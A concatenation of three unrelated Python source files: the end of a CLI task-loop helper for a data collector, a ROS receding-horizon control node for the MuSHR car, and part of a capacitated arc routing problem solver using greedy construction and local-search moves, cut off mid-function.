        finished, task_id, args = begin_task(data_collector, task_id, args)
    else:
        # Interactive loop: keep running tasks until begin_task reports done.
        while not finished:
            finished, task_id, args = begin_task(data_collector, task_id, args)
def begin_task(data_collector: DataCollector, task_id: str, args) -> tuple:
    """Function to handle task selection and the flow of the program

    Args:
        data_collector (DataCollector): Instance of the DataCollector class used to process the file.
        task_id (str): The validated identifier of the task to begin running
        args (Namespace): The CLI arguments

    Returns:
        tuple: (finished, next_task, args) - finished True ends the
        interactive loop in tasks(); args is always cleared to None so later
        iterations fall back to interactive prompts.
    """
    # Unknown IDs dispatch to raise_invalid_task, caught below.
    run_task = task_picker.get(task_id, raise_invalid_task)
    print('------------------ Task: {} ------------------'.format(task_id))
    run_task(data_collector, args)
    print()
    next_task = next_item(task_id)
    finished = None
    if args is not None:
        finished = not args.exit_early
        if finished is True:
            # Not exiting early: fall through to the interactive prompt.
            finished = None
    # Prompt until we get a usable answer: continue, jump to a task, or exit.
    while finished is None:
        try:
            finished = str2bool(check_exit(input('Continue to task {} [Y/n] (e for exit)? '.format(next_task))))
            if finished is False:
                finished = str2bool(check_exit(input('Jump to new task [Y/n] (e for exit)? ')))
                if finished is False:
                    # Declined both: leave with finished False -> caller stops.
                    break
                next_task = validate_task(input('Enter task to run {}: '.format(task_picker.keys())))
        except ArgumentTypeError as e:
            logger.warning('Invalid argument provided, expecting a boolean value')
            finished = None
            continue
        except InvalidTaskIDError as e:
            logger.warning('Invalid task ID entered')
            finished = None
            continue
    args = None
    return not finished, next_task, args
#@debug
def get_doc_uuid(args) -> str:
    """Helper function to get the document UUID

    Falls back to a stdin prompt when the CLI arguments do not carry one.

    Args:
        args (Namespace): The CLI arguments

    Returns:
        str: Document UUID (validated)
    """
    doc_uuid = getattr(args, 'doc_uuid', None) if args is not None else None
    if doc_uuid is None:
        doc_uuid = input('Doc UUID must be specified: ')
    return validate_doc_uuid(doc_uuid)
def get_user_uuid(args) -> str:
    """Helper function to get the user UUID

    Prompts on stdin only when the arguments object is missing the field
    entirely; an explicit None is passed through unvalidated.

    Args:
        args (Namespace): The CLI arguments

    Returns:
        str: User UUID (validated), or None
    """
    if args is None or not hasattr(args, 'user_uuid'):
        user_uuid = input('User UUID: ')
    else:
        user_uuid = args.user_uuid
    return validate_user_uuid(user_uuid) if user_uuid is not None else None
def get_n(args) -> int:
    """Helper function to get the n parameter

    Args:
        args (Namespace): The CLI arguments

    Returns:
        int: n, or None when the arguments carry no limit
    """
    has_limit = args is not None and hasattr(args, 'limit_data')
    return args.limit_data if has_limit else None
def loading_data(done_event: Event) -> None:
    """Display a loading bar while the data is being loaded

    Ticks the alive_progress bar roughly every 100 ms until the caller sets
    done_event; runs on a daemon thread started by tasks().

    Args:
        done_event (Event): An event that gets set when the loading bar finishes
    """
    with alive_bar(title='Processing data file...', total=None) as bar:
        while not done_event.is_set():
            bar()
            sleep(0.1)
def check_exit(string: str) -> str:
    """Verify if the exit flag has been entered by the user

    Terminates the process with status 0 when the user typed 'e' (any case);
    otherwise hands the input back unchanged.

    Args:
        string (str): String entered by the user

    Returns:
        str: returns the unmodified string
    """
    if string.lower() != 'e':
        return string
    sys.exit(0)
|
rhcnode.py | #!/usr/bin/env python
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
import cProfile
import os
import signal
import threading
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from geometry_msgs.msg import Point, PoseStamped
from std_msgs.msg import ColorRGBA, Empty
from std_srvs.srv import Empty as SrvEmpty
from visualization_msgs.msg import Marker
import logger
import parameters
import rhcbase
import rhctensor
import utils
class RHCNode(rhcbase.RHCBase):
    """ROS node wrapping a receding-horizon controller (RHC).

    Subscribes to the inferred-pose and goal topics, steps the controller at
    50 Hz, publishes Ackermann drive commands and the chosen trajectory, and
    exposes soft/hard reset services.
    """

    def __init__(self, dtype, params, logger, name):
        # disable_signals=True: SIGINT is handled by shutdown() in __main__.
        rospy.init_node(name, anonymous=True, disable_signals=True)

        super(RHCNode, self).__init__(dtype, params, logger)

        self.reset_lock = threading.Lock()
        self.inferred_pose_lock = threading.Lock()
        self._inferred_pose = None

        # Last published rollout and the pose it was computed from
        # (guarded by traj_pub_lock).
        self.cur_rollout = self.cur_rollout_ip = None
        self.traj_pub_lock = threading.Lock()

        self.goal_event = threading.Event()
        self.map_metadata_event = threading.Event()
        self.ready_event = threading.Event()
        self.events = [self.goal_event, self.map_metadata_event, self.ready_event]
        self.run = True

        self.do_profile = self.params.get_bool("profile", default=False)

    def start_profile(self):
        # Optional cProfile of the whole control loop; see end_profile().
        if self.do_profile:
            self.logger.warn("Running with profiling")
            self.pr = cProfile.Profile()
            self.pr.enable()

    def end_profile(self):
        if self.do_profile:
            self.pr.disable()
            self.pr.dump_stats(os.path.expanduser("~/mushr_rhc_stats.prof"))

    def start(self):
        """Main loop: initialize, then step the controller at 50 Hz until shutdown."""
        self.logger.info("Starting RHController")
        self.start_profile()
        self.setup_pub_sub()
        self.rhctrl = self.load_controller()
        self.T = self.params.get_int("T")
        # Unblock cb_goal: the controller can accept goals now.
        self.ready_event.set()

        rate = rospy.Rate(50)
        self.logger.info("Initialized")

        while not rospy.is_shutdown() and self.run:
            ip = self.inferred_pose()
            next_traj, rollout = self.run_loop(ip)

            with self.traj_pub_lock:
                if rollout is not None:
                    self.cur_rollout = rollout.clone()
                    self.cur_rollout_ip = ip

            if next_traj is not None:
                self.publish_traj(next_traj, rollout)
                # For experiments. If the car is at the goal, notify the
                # experiment tool
                if self.rhctrl.at_goal(self.inferred_pose()):
                    self.expr_at_goal.publish(Empty())
                    self.goal_event.clear()
            rate.sleep()

        self.end_profile()

    def run_loop(self, ip):
        """Block until a goal exists, then compute one controller step.

        Returns:
            (traj, rollout) from the controller, or (None, None) on shutdown,
            missing pose, or a goal cleared by a concurrent reset.
        """
        self.goal_event.wait()
        if rospy.is_shutdown() or ip is None:
            return None, None
        with self.reset_lock:
            # If a reset is initialed after the goal_event was set, the goal
            # will be cleared. So we have to have another goal check here.
            if not self.goal_event.is_set():
                return None, None
            if ip is not None:
                return self.rhctrl.step(ip)
            # Unreachable (ip checked above); falls through returning None.
            self.logger.err("Shouldn't get here: run_loop")

    def shutdown(self, signum, frame):
        """SIGINT handler: stop ROS, stop the loop and unblock all waiters."""
        rospy.signal_shutdown("SIGINT recieved")
        self.run = False
        for ev in self.events:
            ev.set()

    def setup_pub_sub(self):
        """Register reset services, goal/pose subscribers and command publishers."""
        rospy.Service("~reset/soft", SrvEmpty, self.srv_reset_soft)
        rospy.Service("~reset/hard", SrvEmpty, self.srv_reset_hard)

        car_name = self.params.get_str("car_name", default="car")

        rospy.Subscriber(
            "/move_base_simple/goal", PoseStamped, self.cb_goal, queue_size=1
        )
        rospy.Subscriber(
            "/" + car_name + "/" + rospy.get_param("~inferred_pose_t"),
            PoseStamped,
            self.cb_pose,
            queue_size=10,
        )

        self.rp_ctrls = rospy.Publisher(
            "/"
            + car_name
            + "/"
            + self.params.get_str(
                "ctrl_topic", default="mux/ackermann_cmd_mux/input/navigation"
            ),
            AckermannDriveStamped,
            queue_size=2,
        )

        traj_chosen_t = self.params.get_str("traj_chosen_topic", default="~traj_chosen")
        self.traj_chosen_pub = rospy.Publisher(traj_chosen_t, Marker, queue_size=10)

        # For the experiment framework, need indicators to listen on
        self.expr_at_goal = rospy.Publisher("experiments/finished", Empty, queue_size=1)

    def srv_reset_hard(self, msg):
        """
        Hard reset does a complete reload of the controller
        """
        rospy.loginfo("Start hard reset")
        self.reset_lock.acquire()
        self.load_controller()
        self.goal_event.clear()
        self.reset_lock.release()
        rospy.loginfo("End hard reset")
        return []

    def srv_reset_soft(self, msg):
        """
        Soft reset only resets soft state (like tensors). No dependencies or maps
        are reloaded
        """
        rospy.loginfo("Start soft reset")
        self.reset_lock.acquire()
        self.rhctrl.reset()
        self.goal_event.clear()
        self.reset_lock.release()
        rospy.loginfo("End soft reset")
        return []

    def cb_goal(self, msg):
        """Goal-topic callback: forward the goal once the controller exists."""
        goal = self.dtype(utils.rospose_to_posetup(msg.pose))
        # Wait until start() has constructed self.rhctrl.
        self.ready_event.wait()
        if not self.rhctrl.set_goal(goal):
            self.logger.err("That goal is unreachable, please choose another")
            return
        else:
            self.logger.info("Goal set")
        self.goal_event.set()

    def cb_pose(self, msg):
        """Pose-topic callback: cache the pose and visualize the cached rollout."""
        self.set_inferred_pose(self.dtype(utils.rospose_to_posetup(msg.pose)))

        if self.cur_rollout is not None and self.cur_rollout_ip is not None:
            m = Marker()
            m.header.frame_id = "map"
            m.type = m.LINE_STRIP
            m.action = m.ADD
            with self.traj_pub_lock:
                # Shift the cached rollout from the pose it was computed at to
                # the current pose.
                pts = (
                    self.cur_rollout[:, :2] - self.cur_rollout_ip[:2]
                ) + self.inferred_pose()[:2]

            # NOTE(review): under Python 3 `map` returns an iterator and the
            # len() below would fail; this targets the Python 2 ROS stack -
            # confirm before porting.
            m.points = map(lambda xy: Point(x=xy[0], y=xy[1]), pts)

            r, g, b = 0x36, 0xCD, 0xC4
            m.colors = [ColorRGBA(r=r / 255.0, g=g / 255.0, b=b / 255.0, a=0.7)] * len(
                m.points
            )
            m.scale.x = 0.05

            self.traj_chosen_pub.publish(m)

    def publish_traj(self, traj, rollout):
        """Publish the first control of the planned trajectory as an Ackermann command."""
        assert traj.size() == (self.T, 2)
        assert rollout.size() == (self.T, 3)

        ctrl = traj[0]
        ctrlmsg = AckermannDriveStamped()
        ctrlmsg.header.stamp = rospy.Time.now()
        ctrlmsg.drive.speed = ctrl[0]
        ctrlmsg.drive.steering_angle = ctrl[1]
        self.rp_ctrls.publish(ctrlmsg)

    def set_inferred_pose(self, ip):
        # Pose is written from the subscriber thread; guard with a lock.
        with self.inferred_pose_lock:
            self._inferred_pose = ip

    def inferred_pose(self):
        with self.inferred_pose_lock:
            return self._inferred_pose
if __name__ == "__main__":
params = parameters.RosParams()
logger = logger.RosLog()
node = RHCNode(rhctensor.float_tensor(), params, logger, "rhcontroller")
signal.signal(signal.SIGINT, node.shutdown)
rhc = threading.Thread(target=node.start)
rhc.start()
# wait for a signal to shutdown
while node.run:
signal.pause()
rhc.join()
|
CARP_solver.py | import sys
import queue
import random
import time
import copy
import numpy as np
from multiprocessing import Process,Queue
# CLI (positional): CARP_solver.py <instance-file> -t <seconds> -s <seed>;
# values are read from argv[1], argv[3] and argv[5].
file_path=sys.argv[1]
termin_time=sys.argv[3]
random_seed=sys.argv[5]
start=time.time()
random.seed(random_seed)

# Read the instance file; each line becomes a list of whitespace tokens.
f=open(file_path,encoding='utf-8')
sentimentlist = []
for line in f:
    s = line.strip().split('\t')
    slist=s[0].split()
    sentimentlist.append(slist)
f.close()

# CARP instance header fields.
vertices=0
depot=0
required=0
non_required=0
vehicles=0
capacity=0
total_cost=0
edge_list=[]
for i in sentimentlist:
    if i[0]=='VERTICES':
        vertices=int(i[2])
    elif i[0]=='DEPOT':
        depot=int(i[2])
    elif i[0]=='REQUIRED':
        required=int(i[3])
    elif i[0]=='NON-REQUIRED':
        non_required=int(i[3])
    elif i[0]=='VEHICLES':
        vehicles=int(i[2])
    elif i[0]=='CAPACITY':
        capacity=int(i[2])
    elif i[0]=='TOTAL':
        total_cost=int(i[6])
    elif str.isdigit(i[0]):
        # Edge data row: "s t cost demand".
        edge_list.append(i)
class Node(object):
    """Priority-queue entry for Dijkstra: a (distance, vertex index) pair.

    Ties on distance are broken randomly so equal-cost entries do not
    always order the same way.
    """

    def __init__(self, dis, index):
        self.dis = dis
        self.index = index

    def __lt__(self, other):
        if self.dis == other.dis:
            # Random tie-break.
            return np.random.rand() > 0.5
        return self.dis < other.dis
class Edge(object):
    """A required edge (s, t) with traversal cost c and demand d.

    Ordered by demand with random tie-breaking, so a priority queue of
    edges yields lowest-demand tasks first.
    """

    def __init__(self, s, t ,c ,d ):
        self.s = s
        self.t = t
        self.c = c
        self.d = d

    def __lt__(self, other):
        if self.d == other.d:
            # Random tie-break.
            return np.random.rand() > 0.5
        return self.d < other.d
class Individual(object):
    """A candidate solution: a gene (list of routes) plus its total cost q."""

    def __init__(self, gene,q):
        self.gene = gene
        self.q = q

    def __lt__(self, other):
        # Cheaper solutions sort first in a priority queue.
        return self.q < other.q
class Graph:
    def __init__(self,n_vertices,depot,required,non_required,vehicles,capacity,total_cost,edge_list):
        """Build the road network, all-pairs shortest paths, and task tables.

        Args:
            n_vertices (int): number of vertices (all tables are 1-indexed).
            depot (int): depot vertex.
            required (int): count of required edges.
            non_required (int): count of non-required edges.
            vehicles (int): fleet size.
            capacity (int): per-vehicle capacity.
            total_cost (int): total-cost field from the instance header.
            edge_list (list): rows [s, t, cost, demand] of string tokens.
        """
        self._n_vertices = n_vertices
        self._depot=depot
        self._required=required
        self._non_required=non_required
        self._vehicles=vehicles
        self._capacity=capacity
        self._total_cost=total_cost
        self._edge_list=edge_list
        # All-pairs shortest-path matrix; row/col 0 unused (1-indexed).
        self._all_distance= [[0 for _ in range(n_vertices+1)] for _ in range(n_vertices+1)]
        self._adj = [[] for _ in range(n_vertices+1)]
        self.cost_dic={}    # (s, t) -> traversal cost, both directions
        self.demand_dic={}  # (s, t) -> demand, both directions
        self.task_dic={}    # signed task id -> directed (s, t)
        self.id_dic={}      # directed (s, t) -> signed task id
        idcounter=1
        for i in self._edge_list:
            s=int(i[0])
            t=int(i[1])
            c=int(i[2])
            d=int(i[3])
            self.add_edge(s,t)
            self.add_edge(t,s)
            self.cost_dic[(s,t)]=c
            self.cost_dic[(t,s)]=c
            self.demand_dic[(s,t)]=d
            self.demand_dic[(t,s)]=d
            # Positive id = forward direction, negative id = reversed.
            self.task_dic[idcounter]=(s,t)
            self.task_dic[-idcounter]=(t,s)
            self.id_dic[(s,t)]=idcounter
            self.id_dic[(t,s)]=-idcounter
            idcounter+=1
        # for i in range(1,n_vertices+1):
        #     for j in range(1,n_vertices+1):
        #         self._all_distance[i][j]=self.dijkstra(i, j)
        # Floyd-Warshall over the dense matrix (replaces per-pair Dijkstra).
        for i in range(1,n_vertices+1):
            for j in range(1,n_vertices+1):
                if (i,j) in self.cost_dic:
                    self._all_distance[i][j]=self.cost_dic[(i,j)]
                elif i==j:
                    self._all_distance[i][j]=0
                else:
                    self._all_distance[i][j]=10000000000000
        for k in range(1,n_vertices+1):
            for i in range(1,n_vertices+1):
                for j in range(1,n_vertices+1):
                    if self._all_distance[i][j]> self._all_distance[i][k]+self._all_distance[k][j]:
                        self._all_distance[i][j]=self._all_distance[i][k]+self._all_distance[k][j]
        # print(time.time()-start)
        # tasklist: Edge objects for required edges; tasklist2: raw int rows.
        self.tasklist=[]
        self.tasklist2=[]
        for i in self._edge_list:
            s=int(i[0])
            t=int(i[1])
            c=int(i[2])
            d=int(i[3])
            if d!=0:
                self.tasklist.append(Edge(s,t,c,d))
                self.tasklist2.append([s,t,c,d])
    def add_edge(self, s, t):
        """Record a directed adjacency from vertex s to vertex t."""
        self._adj[s].append(t)
    def dijkstra(self, s ,t):
        """Shortest-path distance from s to t (lazy-deletion Dijkstra).

        Returns:
            int: the distance, or None (implicitly) if t is unreachable -
            the queue can drain without ever popping t.
        """
        S=set()  # NOTE(review): unused; kept to leave behavior untouched.
        visit=set()
        disdic={}
        pq = queue.PriorityQueue()
        for i in range(1,self._n_vertices+1):
            if i !=s:
                disdic[i]=1000000000000
                pq.put_nowait(Node(1000000000000,i))
            else:
                disdic[i]=0
                pq.put_nowait(Node(0,i))
        while not pq.empty():
            u = pq.get()
            u_index=u.index
            if u_index not in visit:
                if u_index==t:
                    return u.dis
                visit.add(u_index)
                for i in self._adj[u_index]:
                    # Lazy decrease-key: push an improved copy rather than
                    # updating the queued entry in place.
                    if disdic[u_index]+self.cost_dic[(u_index,i)] <disdic[i]:
                        pq.put_nowait(Node(disdic[u_index]+self.cost_dic[(u_index,i)],i))
                        disdic[i]=disdic[u_index]+self.cost_dic[(u_index,i)]
def finish_one_task(self,s,t):
cost_sum=0
cost_sum+=self._all_distance[self._depot][t]
cost_sum+=self._all_distance[self._depot][s]
cost_sum+=self.cost_dic[(s,t)]
return cost_sum
def gene_to_string(self,gene):
sline='s '
first=True
for i in gene:
if i==[]:
continue
first_task=True
for j in i:
# j=self.task_dic[j]
task=self.task_dic[j]
# task=j
if first:
addstr=f'0,({task[0]},{task[1]})'
sline=sline+addstr
first=False
first_task=False
else:
if first_task:
addstr=f',0,({task[0]},{task[1]})'
sline=sline+addstr
first_task=False
else:
addstr=f',({task[0]},{task[1]})'
sline=sline+addstr
addstr=f',0'
sline=sline+addstr
return sline
def gene_to_q(self,gene):
q=0
for i in gene:
now=self._depot
for j in i:
j=self.task_dic[j]
# if self._all_distance[j[0]][now]!=0:
# print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}')
# print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}')
q+=self._all_distance[j[0]][now]
q+=self.cost_dic[j]
now=j[1]
# if now!= self._depot:
# print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}')
q+=self._all_distance[now][self._depot]
# print('Next_Car')
return f'q {q}'
def get_q(self,gene):
q=0
for i in gene:
now=self._depot
for j in i:
j=self.task_dic[j]
# print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}')
# print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}')
q+=self._all_distance[j[0]][now]
q+=self.cost_dic[j]
now=j[1]
# if now!= self._depot:
# print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}')
q+=self._all_distance[now][self._depot]
# print('Next_Car')
return q
def gene_output(self,gene):
print(self.gene_to_string(gene[:]))
print(self.gene_to_q(gene[:]))
    def get_gene(self):
        """Randomized greedy constructor over a demand-ordered priority queue.

        Repeatedly collects every task that still fits the remaining vehicle
        capacity, serves the one whose nearer endpoint is closest to the
        current position (random tie-break), and closes the route when
        nothing fits.

        Returns:
            list[list[int]]: a gene - a list of routes of signed task ids.
        """
        tasklist=queue.PriorityQueue()
        for i in self._edge_list:
            s=int(i[0])
            t=int(i[1])
            c=int(i[2])
            d=int(i[3])
            if d!=0:
                tasklist.put_nowait(Edge(s,t,c,d))
        candidate=[]
        route=[]
        gene=[]
        now=self._depot
        task_sum=0
        while not tasklist.empty():
            # Pull (in demand order) every task that still fits the capacity.
            while not tasklist.empty():
                leastd=tasklist.get()
                if leastd.d+task_sum<=self._capacity:
                    candidate.append(leastd)
                else:
                    tasklist.put_nowait(leastd)
                    break
            if len(candidate)==0:
                # Nothing fits: close the route and restart at the depot.
                task_sum=0
                gene.append(route)
                route=[]
                now=self._depot
            else:
                # Find candidates whose nearer endpoint is closest to `now`;
                # the boolean marks which endpoint (True = s) is the near one.
                min_distance=1000000000
                min_list=[]
                for i in range(len(candidate)):
                    taski=candidate[i]
                    disx=self._all_distance[taski.s][now]
                    disy=self._all_distance[taski.t][now]
                    if disx<min_distance :
                        min_list=[]
                        min_list.append((i,True))
                        min_distance=disx
                    elif disx==min_distance:
                        min_list.append((i,True))
                        min_distance=disx
                    if disy<min_distance:
                        min_list=[]
                        min_list.append((i,False))
                        min_distance=disy
                    elif disy==min_distance:
                        min_list.append((i,False))
                        min_distance=disy
                k=random.randint(0,len(min_list)-1)
                min_index=min_list[k][0]
                min_s=min_list[k][1]
                min_task=candidate.pop(min_index)
                if not min_s:
                    # Serve the edge in the reverse direction.
                    temp=min_task.s
                    min_task.s=min_task.t
                    min_task.t=temp
                # Return unused candidates to the queue for later routes.
                for i in candidate:
                    tasklist.put_nowait(i)
                candidate=[]
                task_sum+=min_task.d
                route.append(self.id_dic[(min_task.s,min_task.t)])
                now=min_task.t
        gene.append(route)
        task_sum=0
        now=self._depot
        return gene
def get_gene2(self):
tasklist=copy.deepcopy(self.tasklist2)
route=[]
gene=[]
now=self._depot
task_sum=0
while len(tasklist)>0:
tasklist.sort(key = lambda x:min(graph._all_distance[now][x[0]],graph._all_distance[now][x[1]]))
min_list=[]
min_dis=min(self._all_distance[now][tasklist[0][0]],self._all_distance[now][tasklist[0][1]])
for i in tasklist:
if min(self._all_distance[now][i[0]],self._all_distance[now][i[1]])==min_dis and i[3]+task_sum<self._capacity :
min_list.append(i)
if min_list==[]:
task_sum=0
gene.append(route)
route=[]
now=self._depot
continue
np.random.shuffle(min_list)
min_task=min_list[0]
tasklist.remove(min_task)
task_sum+=min_task[3]
if self._all_distance[now][min_task[0]]<self._all_distance[now][min_task[1]]:
route.append(self.id_dic[(min_task[0],min_task[1])])
else:
route.append(self.id_dic[(min_task[1],min_task[0])])
now=min_task[1]
if now==self._depot:
task_sum=0
gene.append(route)
route=[]
gene.append(route)
task_sum=0
now=self._depot
return gene
    def single_insertion(self,gene,p,k1,k2,k3):
        """Remove the k2-th task of route k1 and, with probability p, reinsert
        it at position k3 of the same route in the cheaper orientation
        (orientation chosen by deadhead + edge cost around the slot).

        NOTE(review): when the random draw is >= p the removed task is dropped
        from the gene entirely (and an emptied route deleted). All in-file
        callers pass p=1, so that branch is effectively unreachable - confirm
        intent before calling with p < 1.
        """
        routek=gene[k1]
        if len(routek)>1:
            pass
        else:
            k2=-1  # route too short for the move: do nothing
        if k2!=-1:
            task_k_index=routek.pop(k2)
            task_k=self.task_dic[task_k_index]
            rp=random.random()
            if rp < p:
                if len(routek)==0:
                    insert_index=0
                    routek.append(task_k_index)
                else:
                    insert_index=k3
                    if insert_index==0:
                        # Insert at the head: compare both orientations against
                        # depot departure and the following task.
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[self._depot][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
                        disy=self._all_distance[self._depot][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[task_k])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
                    elif insert_index==(len(routek)-1):
                        # Append at the tail: compare against the previous task
                        # and the return leg to the depot.
                        before=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][self._depot]
                        disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][self._depot]
                        if disx<disy:
                            routek.append(self.id_dic[task_k])
                        else:
                            routek.append(self.id_dic[(task_k[1],task_k[0])])
                    else:
                        # Interior slot: compare against both neighbors.
                        before=self.task_dic[routek[insert_index-1]]
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
                        disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[task_k])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
            else:
                # Task dropped; delete the route if it is now empty.
                if routek==[]:
                    gene.pop(k1)
        return gene
    def double_insertion(self,gene,p,k1,k2,k3):
        """Remove the adjacent task pair at position k2 of route k1 and, with
        probability p, reinsert the pair at position k3 - forward or fully
        reversed, whichever orientation has the cheaper deadhead.

        NOTE(review): two suspicious branches, kept untouched - (1) when the
        draw is < p and the route emptied, only the first task of the pair is
        restored (the second is dropped); (2) when the draw is >= p the pair
        is moved into a brand-new route appended to the gene. In-file callers
        pass p=1, so (1) is the live code path for emptied routes. Confirm
        intent before relying on p < 1.
        """
        routek=gene[k1]
        if len(routek)>2:
            pass
        else:
            k2=-1  # route too short for a pair move
        if k2!=-1:
            task_k_index=routek.pop(k2)
            task_k_index2=routek.pop(k2)
            task_k=self.task_dic[task_k_index]
            task_k2=self.task_dic[task_k_index2]
            rp=random.random()
            if rp < p:
                if len(routek)==0:
                    # NOTE(review): only the first task is restored here.
                    routek.append(task_k_index)
                else:
                    insert_index=k3
                    if insert_index== 0:
                        # Head slot: depot departure vs. the following task.
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k2[1]][after[0]]
                        disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])])
                            routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])])
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
                    elif insert_index==(len(routek)-1):
                        # Tail slot: previous task vs. the depot return leg.
                        before=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][self._depot]
                        disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][self._depot]
                        if disx<disy:
                            routek.append(self.id_dic[(task_k[0],task_k[1])])
                            routek.append(self.id_dic[(task_k2[0],task_k2[1])])
                        else:
                            routek.append(self.id_dic[(task_k2[1],task_k2[0])])
                            routek.append(self.id_dic[(task_k[1],task_k[0])])
                    else:
                        # Interior slot: compare against both neighbors.
                        before=self.task_dic[routek[insert_index-1]]
                        after=self.task_dic[routek[insert_index]]
                        disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][after[0]]
                        disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][after[0]]
                        if disx<disy:
                            routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])])
                            routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])])
                        else:
                            routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])])
                            routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
            else:
                if routek==[]:
                    gene.pop(k1)
                # Move the pair into a new route at the end of the gene.
                route=[]
                route.append(self.id_dic[(task_k[0],task_k[1])])
                route.append(self.id_dic[(task_k2[0],task_k2[1])])
                gene.append(route)
        return gene
    def swap(self,gene,k1,k2,k3):
        """Swap the tasks at positions k2 and k3 of route k1 (no-op for routes
        of length <= 2), re-orienting each task at its new slot in whichever
        direction gives the cheaper deadhead to its neighbors/depot."""
        routek=gene[k1]
        if len(routek)>2:
            pass
        else:
            k2=-1  # route too short: skip the move
        if k2!=-1:
            task_k_index=routek[k2]
            task_k_index2=routek[k3]
            task_k=self.task_dic[task_k_index]
            task_k2=self.task_dic[task_k_index2]
            # --- Place task_k2 at position k2 (head / tail / interior). ---
            if k2==0:
                after=self.task_dic[routek[k2+1]]
                disx=self._all_distance[self._depot][task_k2[0]]+self._all_distance[task_k2[1]][after[0]]
                disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k2[0]][after[0]]
                if disx<disy:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
                else:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
            elif k2== len(routek)-1:
                before=self.task_dic[routek[k2-1]]
                disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][self._depot]
                disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][self._depot]
                if disx<disy:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
                else:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
            else:
                before=self.task_dic[routek[k2-1]]
                after=self.task_dic[routek[k2+1]]
                disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][after[0]]
                disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][after[0]]
                if disx<disy:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
                else:
                    routek.pop(k2)
                    routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
            # --- Place task_k at position k3 (head / tail / interior). ---
            if k3==0:
                after=self.task_dic[routek[k3+1]]
                disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k[1]][after[0]]
                disy=self._all_distance[self._depot][task_k[1]]+self._all_distance[task_k[0]][after[0]]
                if disx<disy:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
                else:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
            elif k3== len(routek)-1:
                before=self.task_dic[routek[k3-1]]
                disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][self._depot]
                disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][self._depot]
                if disx<disy:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
                else:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
            else:
                before=self.task_dic[routek[k3-1]]
                after=self.task_dic[routek[k3+1]]
                disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][after[0]]
                disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][after[0]]
                if disx<disy:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
                else:
                    routek.pop(k3)
                    routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
        return gene
def list_2_tuple(self,lst):
result=[]
for i in lst:
ti=tuple(i)
result.append(ti)
return tuple(result)
    def single_local_search(self,gene):
        """Hill-climb with single_insertion moves (p=1) until a full pass
        yields no improvement or the global deadline is hit.

        Reads the module-level globals `start` and `termin_time`; stops 0.5 s
        before the termination time.

